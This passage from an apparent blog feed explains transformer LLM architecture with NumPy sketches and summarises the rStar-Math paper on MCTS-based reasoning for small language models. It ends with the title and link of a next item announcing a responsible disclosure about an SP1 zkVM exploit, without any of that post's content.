&lt;p&gt;Large Language Models (LLMs) are advanced artificial intelligence systems designed to understand, generate, and manipulate human language. They are trained on extensive datasets comprising billions of words, enabling them to perform a wide range of language-related tasks.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Key Characteristics of LLMs:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Scale:** LLMs contain many parameters ranging from millions to billions, allowing them to capture intricate patterns and nuances in language.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Training Data:** These models are trained on diverse and extensive text corpora, including books, articles, websites, and other textual sources, providing them with a broad understanding of language usage across different contexts.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Capabilities:** LLMs can perform various tasks such as text generation, translation, summarization, question-answering, and more, often with human-like proficiency.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Underlying Architecture:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Most LLMs are built upon the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1706.03762&quot;&gt;Transformer architecture&lt;&#x2F;a&gt;, introduced in 2017. This architecture uses self-attention to process and generate language efficiently, enabling models to consider the context of words in a sentence and capture long-range dependencies. One great advantage of transformers is that transfer learning can be very effective. Thus, we can train a model using large amounts of data and then adapt it to other tasks using fine-tuning. An LLM that can be adapted to solve multiple different tasks is known as a foundational model. Before data can be processed, it must first be transformed into a sequence of tokens.&lt;&#x2F;p&gt;
&lt;p&gt;Most state-of-the-art LLMs use the decoder part of the transformer, stacked several times (for example, 24, 48, 72, or 100 layers). Each decoder contains the following elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Masked self-attention** : A multi-head attention sub-layer with a causal mask to ensure tokens cannot attend to future positions (we will explain these terms soon).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Feed-forward network** : A position-wise two-layer MLP with a nonlinearity.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Residual Connections** and **Layer Normalization** around each sub-layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;A minimal schematic for decoder layer $m$ is:&lt;br &#x2F;&gt;
$\mathbf{H}_{att}^m = \mathrm{MHA}(\mathbf{H}^{m-1})$&lt;&#x2F;p&gt;
&lt;p&gt;$\mathbf{H}_{addnorm}^m = \mathrm{LayerNorm}(\mathbf{H}^{m-1} + \mathbf{H}_{att}^m)$&lt;&#x2F;p&gt;
&lt;p&gt;$\mathbf{H}_{ffn}^m = \mathrm{FFN}(\mathbf{H}_{addnorm}^m)$&lt;&#x2F;p&gt;
&lt;p&gt;$\mathbf{H}^m = \mathrm{LayerNorm}(\mathbf{H}_{addnorm}^m + \mathbf{H}_{ffn}^m)$&lt;br &#x2F;&gt;
$\mathrm{MHA}$ denotes the multi-head attention function, $\mathrm{LayerNorm}$ the layer normalization function, and $\mathrm{FFN}$ the feed-forward neural network.&lt;&#x2F;p&gt;
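&lt;p&gt;The four equations above can be sketched with NumPy. Here &lt;code&gt;mha&lt;&#x2F;code&gt; and &lt;code&gt;ffn&lt;&#x2F;code&gt; are placeholder callables standing in for the sub-layers, so only the residual-plus-normalization wiring is shown:&lt;&#x2F;p&gt;

```python
import numpy as np

def layer_norm(x, eps=1e-5):
    # Normalize each token's feature vector to zero mean and unit variance.
    mu = x.mean(axis=-1, keepdims=True)
    var = x.var(axis=-1, keepdims=True)
    return (x - mu) / np.sqrt(var + eps)

def decoder_layer(h, mha, ffn):
    """One decoder block, mirroring the schematic above:
    attention, add & norm, feed-forward, add & norm."""
    h_att = mha(h)                    # H_att = MHA(H)
    h_an = layer_norm(h + h_att)      # H_addnorm = LayerNorm(H + H_att)
    h_ffn = ffn(h_an)                 # H_ffn = FFN(H_addnorm)
    return layer_norm(h_an + h_ffn)   # H_out = LayerNorm(H_addnorm + H_ffn)
```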
&lt;p&gt;The attention works by relating three elements: keys, queries, and values, which come from suitable transformations of the layer inputs. These transformations are linear, and the elements of the matrices should be learned by the model:&lt;br &#x2F;&gt;
$\mathbf{Q} = \mathbf{H}^{m - 1} W_Q$&lt;br &#x2F;&gt;
$\mathbf{K} = \mathbf{H}^{m - 1} W_K$&lt;br &#x2F;&gt;
$\mathbf{V} = \mathbf{H}^{m - 1} W_V$&lt;&#x2F;p&gt;
&lt;p&gt;The attention mechanism compares the keys and queries to find the best value match. One way to find a correlation between two vectors is via the cosine of the angle formed by queries and keys,&lt;br &#x2F;&gt;
$$\cos (\theta) = \frac{\mathbf{Q^t} \mathbf{K}}{\lVert\mathbf{Q} \rVert \lVert \mathbf{K} \rVert}$$&lt;br &#x2F;&gt;
The scalar product between two vectors shows how correlated they are. In LLMs, we use the softmax function, which ensures that the activations are positive and at most 1:&lt;br &#x2F;&gt;
$$a_{nm} = \frac{\exp(x_n^t x_m)}{\sum_l \exp(x_n^t x_l)}$$&lt;&#x2F;p&gt;
&lt;p&gt;There are two necessary adjustments to attention: scaling and causality. The first one is needed to rescale the arguments of the softmax function and avoid getting vanishingly small gradients. Causality ensures that a token cannot attend to future tokens so that the model can only use current or previous tokens, enabling autoregressive generation. Thus,&lt;br &#x2F;&gt;
$\mathbf{H}_{att,s} = \mathrm{attention}(\mathbf{Q}, \mathbf{K}, \mathbf{V}) = \mathrm{softmax}\left( \frac{\mathbf{Q} \mathbf{K}^t}{\sqrt{d_k}} + \mathbf{M} \right) \mathbf{V}$&lt;br &#x2F;&gt;
where $\mathbf{M}$ is the mask, which makes all the positions where a token should not attend future tokens equal to $- \infty$ (so that when we apply the softmax function, those elements are equal to zero). $d_k$ is the length of the key vector.&lt;&#x2F;p&gt;
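&lt;p&gt;A minimal single-head NumPy sketch of this masked, scaled attention (illustrative only):&lt;&#x2F;p&gt;

```python
import numpy as np

def softmax(x):
    # Numerically stable softmax along the last axis.
    e = np.exp(x - x.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

def causal_attention(Q, K, V):
    """Single-head scaled dot-product attention with the causal mask M."""
    T, d_k = Q.shape
    scores = Q @ K.T / np.sqrt(d_k)                 # Q K^t / sqrt(d_k)
    future = np.triu(np.ones((T, T)), k=1)          # 1 above the diagonal = future tokens
    scores = np.where(future == 1.0, -1e9, scores)  # mask plays the role of -infinity
    return softmax(scores) @ V                      # attention weights times values
```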
&lt;p&gt;The multi-head attention function has $h$ different heads (each with its own key, query, and value projection matrices). It concatenates the results of each head (basically gluing them one after the other) and applies a matrix $\mathbf{W}^o$,&lt;br &#x2F;&gt;
$head_i = \mathrm{attention}(\mathbf{H}^{m - 1} W_Q^i , \mathbf{H}^{m - 1} W_K^i , \mathbf{H}^{m - 1} W_V^i )$&lt;br &#x2F;&gt;
$\mathbf{H}_{att} = \mathrm{concatenate} \left( head_1 , head_2 , \dots , head_h \right) \mathbf{W}^o$&lt;&#x2F;p&gt;
&lt;p&gt;After attention and normalization, each token’s representation goes through a &lt;strong&gt;position-wise&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Multilayer_perceptron&quot;&gt;MLP&lt;&#x2F;a&gt; (applied identically to each sequence position, hence “position-wise”):&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\mathbf{z} = \mathbf{h} W_1 + \mathbf{b}_1,&lt;br &#x2F;&gt;
\quad&lt;br &#x2F;&gt;
\mathbf{z}' = \sigma(\mathbf{z}),&lt;br &#x2F;&gt;
\quad&lt;br &#x2F;&gt;
\mathbf{h}' = \mathbf{z}' W_2 + \mathbf{b}_2,&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathbf{h} \in \mathbb{R}^{d}$ is a single token’s representation from the attention sub-layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $W_1 \in \mathbb{R}^{d \times d_{\text{ff}}}$, $W_2 \in \mathbb{R}^{d_{\text{ff}} \times d}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\sigma$ is typically a **GELU** (Gaussian error linear unit) or **ReLU** ([rectified linear unit](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Rectifier_\(neural_networks\))) nonlinearity (activation function).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * This is done for each position independently, so in matrix form:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\text{FFN}(\mathbf{H}) = \max\bigl(0, \mathbf{H} W_1 + \mathbf{b}_1\bigr) W_2 + \mathbf{b}_2.$$&lt;&#x2F;p&gt;
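&lt;p&gt;In NumPy, this position-wise FFN with a ReLU is a one-liner (illustrative sketch):&lt;&#x2F;p&gt;

```python
import numpy as np

def ffn(H, W1, b1, W2, b2):
    """Position-wise feed-forward network with a ReLU nonlinearity:
    FFN(H) = max(0, H W1 + b1) W2 + b2, applied to every position at once."""
    return np.maximum(0.0, H @ W1 + b1) @ W2 + b2
```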
&lt;p&gt;Before the model can read text or images, the input has to be transformed into tokens. Let the input be a sequence of tokens:&lt;br &#x2F;&gt;
$(x_1, x_2, \dots, x_T),$&lt;br &#x2F;&gt;
where each $x_i$ is an integer index into a vocabulary. We map each $x_i$ to a &lt;strong&gt;d&lt;&#x2F;strong&gt;-dimensional embedding vector:&lt;br &#x2F;&gt;
$\mathbf{E}(x_i) \in \mathbb{R}^d.$&lt;br &#x2F;&gt;
Thus, the input sequence is transformed into an embedding matrix:&lt;br &#x2F;&gt;
$\mathbf{X} = \bigl[ \mathbf{E}(x_1), \mathbf{E}(x_2), \ldots, \mathbf{E}(x_T) \bigr] \in \mathbb{R}^{T \times d}.$&lt;&#x2F;p&gt;
&lt;p&gt;A decoder-only Transformer must still encode the notion of sequence position. Common methods include:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Learned positional embeddings** : A trainable $\mathbf{P}(i) \in \mathbb{R}^d$ for each position $i$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Sinusoidal (original Transformer)** :  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\text{PE}(i, 2k) &amp;amp;= \sin\Bigl(\tfrac{i}{10000^{2k&#x2F;d}}\Bigr), \\&lt;br &#x2F;&gt;
\text{PE}(i, 2k+1) &amp;amp;= \cos\Bigl(\tfrac{i}{10000^{2k&#x2F;d}}\Bigr).&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$
* &lt;strong&gt;Rotary Positional Embeddings (RoPE)&lt;&#x2F;strong&gt; : A rotation in the query&#x2F;key space (commonly used in GPT-NeoX, LLaMa, etc.).&lt;&#x2F;p&gt;
&lt;p&gt;Either way, the next step is typically:&lt;br &#x2F;&gt;
$\mathbf{H}^{(0)} = \mathbf{X} + \mathbf{P},$&lt;br &#x2F;&gt;
where $\mathbf{P}$ indicates the positional information (shape $\mathbb{R}^{T \times d}$, same as $\mathbf{X}$).&lt;&#x2F;p&gt;
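&lt;p&gt;The sinusoidal variant can be sketched in NumPy as follows (assuming an even model dimension $d$):&lt;&#x2F;p&gt;

```python
import numpy as np

def sinusoidal_pe(T, d):
    """Sinusoidal positional encodings of shape (T, d); d is assumed even."""
    pos = np.arange(T)[:, None]         # positions i
    k2 = np.arange(0, d, 2)[None, :]    # even feature indices 2k
    angles = pos / (10000.0 ** (k2 / d))
    pe = np.zeros((T, d))
    pe[:, 0::2] = np.sin(angles)        # PE(i, 2k)
    pe[:, 1::2] = np.cos(angles)        # PE(i, 2k+1)
    return pe
```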
&lt;p&gt;&lt;strong&gt;Applications:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Natural Language Processing (NLP):** LLMs enhance various NLP tasks, including sentiment analysis, entity recognition, and language translation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Content Creation:** They assist in generating articles, reports, and even creative writing, aiding authors and content creators.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Customer Service:** LLMs power chatbots and virtual assistants, providing human-like interactions in customer support scenarios.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Challenges and Considerations:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Despite their impressive capabilities, LLMs face challenges such as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Resource Intensity:** Training and deploying LLMs require substantial computational resources, making them accessible primarily to large organizations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Ethical Concerns:** Issues like the generation of biased or inappropriate content and the potential for misuse necessitate careful consideration and responsible deployment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Interpretability:** Understanding the decision-making process of LLMs can be complex, raising concerns about transparency and trustworthiness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In general, one would expect that the quality of the responses and LLM capabilities should be higher, given a greater set of parameters. The problem with this approach is that models become prohibitively expensive to train and fine-tune and cannot be run locally by users. The paper shows how a smaller LLM can outperform more powerful LLMs by using deep thinking and using the following concepts and ideas:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Code-Augmented Chain-of-Thought (CoT) Data Synthesis** : This method generates step-by-step verified reasoning trajectories by performing extensive Monte Carlo Tree Search (MCTS) rollouts. These trajectories are used to train the policy smaller language model (SLM), ensuring it learns accurate and logical reasoning steps.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Process Reward Model Training** : Instead of naïve step-level score annotation, the authors develop a more effective process preference model (PPM). This model evaluates the quality of reasoning steps, guiding the policy SLM to produce better solutions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Self-Evolution Framework** : The policy SLM and PPM are built from scratch and iteratively evolved through multiple rounds. In each round, millions of synthesized solutions for a large set of math problems are generated, progressively enhancing the reasoning capabilities of the models.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It is important to note that while an LLM can provide a correct answer for a given problem, the reasoning may be flawed or contain invalid steps. Thus, it is essential that the model can learn how to avoid invalid steps along the way. rStar decouples reasoning into a generation-discrimination process. The following section will discuss the techniques used to train and improve the LLM.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;techniques&quot;&gt;Techniques&lt;&#x2F;h2&gt;
&lt;p&gt;rStar’s process involves generating alternative steps and reasoning about them. The main techniques are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Monte Carlo Tree Search** (MCTS): [MCTS](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Monte_Carlo_tree_search) is used at test time to explore multiple reasoning paths. The policy SLM generates potential steps, and the PPM evaluates them, guiding the search towards the most promising solutions. MCTS is used because it breaks down problems into single-step generation tasks, yielding step-level training data for the LLM. Besides, this approach is simpler than Best-of-N or self-consistency, which require generating full solutions at once.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Code-Augmented Data Synthesis** : By incorporating code execution into the data synthesis process, the system ensures the generated reasoning steps are verifiable and correct, providing high-quality training data for the policy SLM.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Process Preference Modeling (PPM)** : The PPM assesses the quality of intermediate reasoning steps, allowing the system to prefer more logical and accurate paths during the MCTS exploration.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Self-Evolution Strategy** : Through iterative training rounds, both the policy SLM and PPM are refined. Each round uses the outputs from the previous iteration to improve performance, enabling the models to develop advanced reasoning capabilities over time.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;MCTS is a decision-making algorithm used in complex domains such as board games (Go, Chess, Shogi), combinatorial optimization, and various planning problems. The key idea of MCTS is to incrementally build a search tree by running many simulated “playouts” (or rollouts) from a given state and using the simulation results to guide which parts of the tree should be explored more deeply. The four steps for MCTS are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Selection** : Starting at the root node (the current game state), select child nodes down the tree according to a selection policy that balances exploration (trying less-visited moves) and exploitation (focusing on moves that appear promising). The Upper Confidence Bound for Trees (UCT) is a standard selection policy.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Expansion** : When you reach a node that is not a terminal state and has unvisited child states (moves), expand one (or more) of those child nodes in the tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Simulation (Rollout)** : From the expanded node, simulate a random (or semi-random) sequence of moves until reaching a terminal state (i.e., game over or a pre-defined depth for non-terminal states). The outcome of this simulation (win&#x2F;lose&#x2F;draw or another reward measure) is recorded.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Backpropagation** : Propagate the simulation’s result back up through the visited nodes in the tree, updating statistics (e.g., total reward, visit counts). This information is used to inform the next selection step.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
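&lt;p&gt;The four phases above can be sketched as a generic loop. This is a toy illustration rather than the rStar-Math implementation; &lt;code&gt;expand&lt;&#x2F;code&gt; and &lt;code&gt;rollout&lt;&#x2F;code&gt; are hypothetical problem-specific callbacks:&lt;&#x2F;p&gt;

```python
import math
import random

class Node:
    def __init__(self, state, parent=None):
        self.state, self.parent = state, parent
        self.children, self.visits, self.reward = [], 0, 0.0

def uct(node, c=1.4):
    # Exploitation term plus exploration bonus (standard UCT).
    return node.reward / node.visits + c * math.sqrt(
        math.log(node.parent.visits) / node.visits)

def mcts(root, expand, rollout, iters=100):
    """Generic MCTS loop: selection, expansion, simulation, backpropagation."""
    for _ in range(iters):
        node = root
        # 1. Selection: descend while every child has been visited.
        while node.children and all(ch.visits for ch in node.children):
            node = max(node.children, key=uct)
        # 2. Expansion: create children the first time we reach a node.
        if not node.children:
            node.children = [Node(s, node) for s in expand(node.state)]
        unvisited = [ch for ch in node.children if ch.visits == 0]
        if unvisited:
            node = random.choice(unvisited)
        # 3. Simulation: evaluate a playout from this state.
        r = rollout(node.state)
        # 4. Backpropagation: update statistics up to the root.
        while node is not None:
            node.visits += 1
            node.reward += r
            node = node.parent
    return max(root.children, key=lambda ch: ch.visits)
```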
&lt;p&gt;In this case, the LLM first builds the MCTS tree using a set of human-like reasoning actions to produce higher-quality reasoning trajectories, such as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Propose a one-step thought**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Complete reasoning thought**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Propose subquestions and answer**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Re-answer the subquestion**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Rephrase the question**.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;These are typical actions that we as humans do to solve complex tasks. We rephrase or find related questions that can help us shed new light on the problem.&lt;&#x2F;p&gt;
&lt;p&gt;A second LLM verifies each trajectory proposed by the first one and assesses their validity. If there is an agreement between both, the trajectories can be considered mutually consistent and valid with high likelihood. This resembles working with peers and checking each other’s answers. Since each step contains Python code, only those nodes with successful code execution are kept. These high-quality trajectories will be used as part of the training set.&lt;&#x2F;p&gt;
&lt;p&gt;The authors introduce a method to provide step-by-step verified trajectories with per-step Q-value annotations. They use four rounds of self-evolution: the first two are terminal-guided MCTS (since the PPM still has not been trained), while the next two rely on the trained PPM. Starting from the tree’s root (the original query), the LLM generates different alternative steps and annotates each with a Q-value. The process proceeds until the LLM reaches a solution corresponding to a tree leaf, $s_d$. Each $s_d$ contains a sequence of steps linking it to the root, corresponding to a single trajectory. Initially, all Q-values are set to $0$. We generate each new level of the tree until we reach the first leaf (terminal node) and reward it according to whether it arrived at the correct answer. Then, this score is backpropagated to all the steps in the trajectory, according to $Q(s_k) = Q(s_k) + Q(s_d)$. The more valid trajectories pass through a node, the higher its $Q$-value. Finally, the LLM takes the $n$ highest-quality trajectories to use as training data.&lt;&#x2F;p&gt;
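&lt;p&gt;The score propagation along one trajectory can be sketched as follows (a hypothetical helper, not the paper’s code):&lt;&#x2F;p&gt;

```python
def backpropagate(trajectory_q, leaf_score):
    """Back-propagate the leaf's score s_d to every step s_k on the path:
    Q(s_k) = Q(s_k) + Q(s_d).  `trajectory_q` holds the current per-step
    Q-values from root to leaf."""
    return [q + leaf_score for q in trajectory_q]
```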
&lt;p&gt;Upper Confidence Bound for Trees (UCT) balances exploration and exploitation. For a node $k$, its UCT value is computed as&lt;br &#x2F;&gt;
$$UCT(k) = \frac{W_k}{N_k} + c \sqrt{\frac{\ln N_p}{N_k}}$$&lt;&#x2F;p&gt;
&lt;p&gt;where $W_k$ is the total reward of node $k$, $N_k$ is the number of times node $k$ has been visited, $N_p$ is the number of times the parent node of $k$ has been visited, and $c$ is a constant. A higher value of $c$ favors exploration. The first term focuses on the reward of the node (exploitation), while the second encourages exploration by penalizing nodes with high visit counts relative to their parent. The reward is first given by terminal-node correctness and later by the PPM. The authors introduce a novel training method based on positive-negative preference pairs.&lt;&#x2F;p&gt;
&lt;p&gt;Since SLMs have weaker capabilities, the authors used four rounds of MCTS deep thinking to generate progressively higher-quality data and extend the training set with more challenging problems:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Round 1** : Bootstrapping an initial strong policy model, SLM-r1. This round uses terminal-annotated Q-values and performs 8 MCTS rollouts for efficiency. The data obtained is used to train PPM-r1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Round 2** : Training a reliable PPM PPM-r2. Using PPM-r1, the authors conduct lots of MCTS with 16 rollouts per problem.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Round 3** : PPM-augmented MCTS for improved data quality. Using PPM-r2, the model tackles more complex problems and generates additional data to train PPM-r3.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Round 4** : Solving more challenging problems. For unsolved problems, the authors increase the number of rollouts to 64 or 128 and produce different MCTS with various initial seeds. This step boosts the success rate of the math model.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;results&quot;&gt;Results&lt;&#x2F;h2&gt;
&lt;p&gt;After four rounds of self-evolution, rStar-Math significantly improved the math reasoning abilities of SLMs. For instance, on the MATH benchmark, it enhanced Qwen2.5-Math-7B’s performance from 58.8% to 90.0% and Phi3-mini-3.8B’s from 41.4% to 86.4%, surpassing OpenAI’s o1-preview model. Additionally, on the USA Math Olympiad (AIME), rStar-Math solved an average of 53.3% of problems, ranking among the top 20% of high school math students. The following graphs compare the performance of rStar-math in different benchmarks with other LLMs based on the number of rollouts.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SyLxqMdP1x.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;LLMs have shown great capabilities in understanding human language, image generation, and developing agents to perform various tasks. While their performance and accuracy have increased, this has been at the cost of a larger number of parameters, increasing training and inference costs and making it impossible for users to run them locally or fine-tune them to perform a particular task. Another important point is that LLMs can hallucinate, providing invalid answers or giving the right answer with flawed reasoning. This work explores how to use deep thinking with smaller LLMs to improve performance, which could enable users to run the model locally or even fine-tune it. Using Monte Carlo Tree Search, scoring strategies inspired by Go engines, and code-augmented data, rStar-math achieves performance similar to that of much larger LLMs. In summary, rStar-Math demonstrates that with innovative training and reasoning strategies, small language models can achieve state-of-the-art performance in mathematical reasoning tasks, rivaling or surpassing larger models.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Responsible  disclosure of an exploit in Succinct&#x27;s SP1 zkVM, found in partnership with 3MI Labs and Aligned, which arises from the interaction of two distinct security vulnerabilities.</title>
          <pubDate>Sun, 26 Jan 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-of-an-exploit-in-succincts-sp1-zkvm-found-in-partnership-with-3mi-labs-and-aligned-which-arises-from-the-interaction-of-two-distinct-security-vulnerabilities/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-of-an-exploit-in-succincts-sp1-zkvm-found-in-partnership-with-3mi-labs-and-aligned-which-arises-from-the-interaction-of-two-distinct-security-vulnerabilities/</guid>
